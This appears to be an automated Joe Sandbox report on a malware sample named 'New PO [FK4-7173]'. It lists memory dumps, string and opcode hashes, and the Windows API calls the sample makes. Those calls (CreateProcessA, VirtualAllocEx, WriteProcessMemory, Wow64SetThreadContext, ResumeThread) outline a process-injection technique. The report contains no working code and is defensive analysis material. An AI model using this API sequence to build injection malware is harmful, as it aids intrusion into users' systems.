                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:251
                                                                          Total number of Limit Nodes:14
ResumeThread 56379->56380 56382 5138109 56380->56382 56382->56334 56384 5138098 ResumeThread 56383->56384 56386 5138109 56384->56386 56386->56334 56388 51389b8 Wow64SetThreadContext 56387->56388 56390 5138a45 56388->56390 56390->56338 56392 51389fd Wow64SetThreadContext 56391->56392 56394 5138a45 56392->56394 56394->56338 56396 5138e61 56395->56396 56396->56396 56397 5138fc6 CreateProcessA 56396->56397 56398 5139023 56397->56398 56398->56398 56400 5138dd8 56399->56400 56400->56400 56401 5138fc6 CreateProcessA 56400->56401 56402 5139023 56401->56402 56402->56402 56404 5138c8b ReadProcessMemory 56403->56404 56406 5138ccf 56404->56406 56406->56348 56408 5138c40 ReadProcessMemory 56407->56408 56410 5138ccf 56408->56410 56410->56348 56412 5138b98 WriteProcessMemory 56411->56412 56414 5138bef 56412->56414 56414->56353 56416 5138b50 WriteProcessMemory 56415->56416 56418 5138bef 56416->56418 56418->56353 56420 5138ad0 VirtualAllocEx 56419->56420 56422 5138b0d 56420->56422 56422->56376 56424 5138a90 VirtualAllocEx 56423->56424 56426 5138b0d 56424->56426 56426->56376

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$,gq$,gq
                                                                          • API String ID: 0-2401767512
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$Hgq
                                                                          • API String ID: 0-2239030825
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: D
                                                                          • API String ID: 0-2746444292
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$(ocq$(ocq$(ocq$(ocq$,gq$,gq
                                                                          • API String ID: 0-3338910979

                                                                          Control-flow Graph

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq$(ocq$(ocq
                                                                          • API String ID: 0-2003149739

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq$(ocq
                                                                          • API String ID: 0-3612734936
                                                                          • Opcode ID: 1a8eef3ad94e4d74b34d6c8c545130194a80b1503eaaccc1095caab010d82885
                                                                          • Instruction ID: 67cd2de1d74d8fb2c47a3184da40bb8d3962278d3fb700cd171eda8f13ea23fa
                                                                          • Opcode Fuzzy Hash: 1a8eef3ad94e4d74b34d6c8c545130194a80b1503eaaccc1095caab010d82885
                                                                          • Instruction Fuzzy Hash: 09F1F3B0A1411ADFCB15CF99C580DAFBBF6FB88300B15C659E9559B6A0C734F841CB90

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Hgq$Hgq
                                                                          • API String ID: 0-3391890871
                                                                          • Opcode ID: 9c3c42fb33b4e4bae08f2a6bb2ecbd55d21b761a71ff6a6e493c22d2e1a259f0
                                                                          • Instruction ID: 51bac274e89f670dfcfffb93798d8f08b7fb0a636659f0119dcab9b5f5337330
                                                                          • Opcode Fuzzy Hash: 9c3c42fb33b4e4bae08f2a6bb2ecbd55d21b761a71ff6a6e493c22d2e1a259f0
                                                                          • Instruction Fuzzy Hash: 0491BFB57042959FDB159F288858BBE7BE2FB89300F048669E8058B395DB38CC85C791

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: ,gq$,gq
                                                                          • API String ID: 0-2533611571
                                                                          • Opcode ID: b6be6d5c863d8432d772c47b30c43ca01c14df6fd800222bca935c1deaafff7b
                                                                          • Instruction ID: e7424b43162c0bc1c7fdbce16305fd2a26438e3379e0ef5fd7fab6b98b8b8a56
                                                                          • Opcode Fuzzy Hash: b6be6d5c863d8432d772c47b30c43ca01c14df6fd800222bca935c1deaafff7b
                                                                          • Instruction Fuzzy Hash: EB9161B4A001469FCB98CF69C4849EFBBF1FF89204B158265E816DB365D731E881CB61

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $
                                                                          • API String ID: 0-227171996
                                                                          • Opcode ID: 66eb6b8dbda1a1afb48c7c4f128456309c87de3367f361d72559622ed5a70c42
                                                                          • Instruction ID: 41015f80e018f5bdb7785fcfe3bbb7a27e8dd49988797fd82b02f28178af5248
                                                                          • Opcode Fuzzy Hash: 66eb6b8dbda1a1afb48c7c4f128456309c87de3367f361d72559622ed5a70c42
                                                                          • Instruction Fuzzy Hash: 8071BF31910601CFFB04EF28D484A54B7B1FF99304B50C6A8D949AF326EB35F98ACB80

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $
                                                                          • API String ID: 0-227171996
                                                                          • Opcode ID: e37b02e1f5bdbf741cc59151b463297447edc30f3819c9798c7c8eb518c1cb74
                                                                          • Instruction ID: 4fe9c393e76147b8cb172b63119c6adaeb5d943e3ff26c9f366b8a594e3cf0ee
                                                                          • Opcode Fuzzy Hash: e37b02e1f5bdbf741cc59151b463297447edc30f3819c9798c7c8eb518c1cb74
                                                                          • Instruction Fuzzy Hash: 0071AE35910701CFFB05EF28D484A54B7B1FF95304B4186A8D949AF326EB35F98ACB80

                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq$Tecq
                                                                          • API String ID: 0-2088518435
                                                                          • Opcode ID: 91e83f207284d237ef63829320cd288c177fc917b3344f66201abfd9bc59d8c2
                                                                          • Instruction ID: b56143733d0e1f98d7bc794efc56d01553bab37303576cab41a66543431fb9e7
                                                                          • Opcode Fuzzy Hash: 91e83f207284d237ef63829320cd288c177fc917b3344f66201abfd9bc59d8c2
                                                                          • Instruction Fuzzy Hash: CD5197B4E006199FDB08DFA9C984AAEFBF2FF88301F10812AE915A7354DB756905CF50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Tecq$Tecq
                                                                          • API String ID: 0-2088518435
                                                                          • Opcode ID: 0cb10cf08080182f375eeb40f504e756943a049263a94e5518c5539deec6fe75
                                                                          • Instruction ID: f5e15937b2c2d2186044956fc8dafee84351c682564ecbd159cf887544c014d1
                                                                          • Opcode Fuzzy Hash: 0cb10cf08080182f375eeb40f504e756943a049263a94e5518c5539deec6fe75
                                                                          • Instruction Fuzzy Hash: 7051CCB4E006189FDB08DFE9D944A9EFBB2FF88301F10812AD915AB354DB755906CF50
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: Hgq$Hgq
                                                                          • API String ID: 0-3391890871
                                                                          • Opcode ID: ab171584ff28cf0a2a46e63b33b8296c377e0feb9910acc597d0f87275754ecc
                                                                          • Instruction ID: 35b1152ba3b54e2696f073bf6e1e6e98877664225046a2e961691b867f8da81f
                                                                          • Opcode Fuzzy Hash: ab171584ff28cf0a2a46e63b33b8296c377e0feb9910acc597d0f87275754ecc
                                                                          • Instruction Fuzzy Hash: 0C41C070B002198FDB09AF7C88605AE7BB6EFC9200B14446AD406EB395EF349D0587A2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: $cq$$cq
                                                                          • API String ID: 0-2695052418
                                                                          • Opcode ID: d0bf7f7a45eacb561b1751f264c83f7f11a791198a66bd3d7db4410f554b6750
                                                                          • Instruction ID: 48a2a9c1f84ad433c5da377629d2c3a896b1733609cbe4838bfb1a027192fbdc
                                                                          • Opcode Fuzzy Hash: d0bf7f7a45eacb561b1751f264c83f7f11a791198a66bd3d7db4410f554b6750
                                                                          • Instruction Fuzzy Hash: CD31C7F43042964FCB29DB29E85463F7BA5FF85340B246A9AD811CB296DB24CC40D791
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513900E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: 1e69341bb206dfc85180fdf76d1a46aecf6921534aca5aa5500615ad2f5f7863
                                                                          • Instruction ID: 0438d4ed1cb9fe49924fe5da5901cf64239bf31da7e35ff6bedbb20c6adbece1
                                                                          • Opcode Fuzzy Hash: 1e69341bb206dfc85180fdf76d1a46aecf6921534aca5aa5500615ad2f5f7863
                                                                          • Instruction Fuzzy Hash: F5A15A71D00219DFEB20CF68CC55BEDBBB2BF48314F1481A9E809A7280DB749985CF92
                                                                          APIs
                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0513900E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateProcess
                                                                          • String ID:
                                                                          • API String ID: 963392458-0
                                                                          • Opcode ID: e6fdea824de9da5c16757723dad5190d48d459c074b38a344da1bdf0c7025b76
                                                                          • Instruction ID: e056055f0629e05155eb5ae1fcdfa38e0fd18392dc6eb2eaeefc9c41347b4bce
                                                                          • Opcode Fuzzy Hash: e6fdea824de9da5c16757723dad5190d48d459c074b38a344da1bdf0c7025b76
                                                                          • Instruction Fuzzy Hash: 30915B71D00219DFEF20CF68C955BEDBBB2BF48314F1481A9E809A7280DB749985CF91
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2036673817.0000000007050000.00000040.00000800.00020000.00000000.sdmp, Offset: 07050000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7050000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: (ocq
                                                                          • API String ID: 0-1855696158
                                                                          • Opcode ID: 66775de849ea1e154ca9575b240285a04a88e0b3c199a79ef3d5fc0518b69899
                                                                          • Instruction ID: b0f4e89316e4df8de394b9ec4f98b6e87a5cd80930af6d6190a3e68483ab9832
                                                                          • Opcode Fuzzy Hash: 66775de849ea1e154ca9575b240285a04a88e0b3c199a79ef3d5fc0518b69899
                                                                          • Instruction Fuzzy Hash: C6022AB4610116DFCB14CF68C988AAFBBF2BF88304F158655E81A9B391C734F981CB59
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B43FE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          APIs
                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04B43FE2
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CreateWindow
                                                                          • String ID:
                                                                          • API String ID: 716092398-0
                                                                          APIs
                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B46561
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033372903.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b40000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: CallProcWindow
                                                                          • String ID:
                                                                          • API String ID: 2714655100-0
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04A273F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          APIs
                                                                          • CreateActCtxA.KERNEL32(?), ref: 04A273F1
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: Create
                                                                          • String ID:
                                                                          • API String ID: 2289755597-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05138BE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05138BE0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessWrite
                                                                          • String ID:
                                                                          • API String ID: 3559483778-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05138CC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05138A36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,04A2F66E,?,?,?,?,?), ref: 04A2F72F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: DuplicateHandle
                                                                          • String ID:
                                                                          • API String ID: 3793708945-0
                                                                          APIs
                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05138CC0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MemoryProcessRead
                                                                          • String ID:
                                                                          • API String ID: 1726664587-0
                                                                          APIs
                                                                          • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 05138A36
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ContextThreadWow64
                                                                          • String ID:
                                                                          • API String ID: 983334009-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05138AFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05138AFE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: AllocVirtual
                                                                          • String ID:
                                                                          • API String ID: 4275171209-0
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: ResumeThread
                                                                          • String ID:
                                                                          • API String ID: 947044025-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          APIs
                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 04A2D426
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2032800963.0000000004A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A20000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4a20000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: HandleModule
                                                                          • String ID:
                                                                          • API String ID: 4139908857-0
                                                                          APIs
                                                                          • PostMessageW.USER32(?,00000010,00000000,?), ref: 0513B615
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2034953877.0000000005130000.00000040.00000800.00020000.00000000.sdmp, Offset: 05130000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_5130000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID: MessagePost
                                                                          • String ID:
                                                                          • API String ID: 410705778-0
                                                                          • Instruction ID: 46b86a2299494b7bc95b62dca9417bf652b5c49fb0ced731c21cbc88c52cc5a7
                                                                          • Opcode Fuzzy Hash: 00bce2be3a3f8cb11e0687482b5ba8f78651a8e766a68a1953ff5b461e9db24e
                                                                          • Instruction Fuzzy Hash: ED91F77590060ACFCB41DF68C880999FBF5FF89310B14879AE819EB256E770E985CB80
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ad0a4a7cfa5187541fbd3ca80cc9899372e707e670c20087fdd2596da477263f
                                                                          • Instruction ID: 927e650f80f2d2fdab06c2192508d759745ef9d163889339b166943d0dab39ea
                                                                          • Opcode Fuzzy Hash: ad0a4a7cfa5187541fbd3ca80cc9899372e707e670c20087fdd2596da477263f
                                                                          • Instruction Fuzzy Hash: CB71BBB8200A00CFC758DF29C488959BBF2FF8961971589A9E55ACB372DB72EC41CF50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0bd8c74756554023f2a14c08073ca49c87661201036a5ecb83ec49c5bdae1db8
                                                                          • Instruction ID: a6b39c7e61bfaabdcc562e280d64b470c040f5867de56e746ba156acf4a845b2
                                                                          • Opcode Fuzzy Hash: 0bd8c74756554023f2a14c08073ca49c87661201036a5ecb83ec49c5bdae1db8
                                                                          • Instruction Fuzzy Hash: A041AF70A02208EFDB18DFB4E85459EBFB2FF85304F1184AAE452A7651DF30AC55CB50
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2033429463.0000000004B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B70000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_4b70000_New PO [FK4-7173].jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 43af70593b5a3a161d396931e8a3aeb41e5239ed386d48ad2e92a15a7b0f04a6
                                                                          • Instruction ID: 7eb64cc8e0dea6f2f38216ed50312d97e343a20d5fbe09a5155b88eddd8003b7
                                                                          • Opcode Fuzzy Hash: 43af70593b5a3a161d396931e8a3aeb41e5239ed386d48ad2e92a15a7b0f04a6
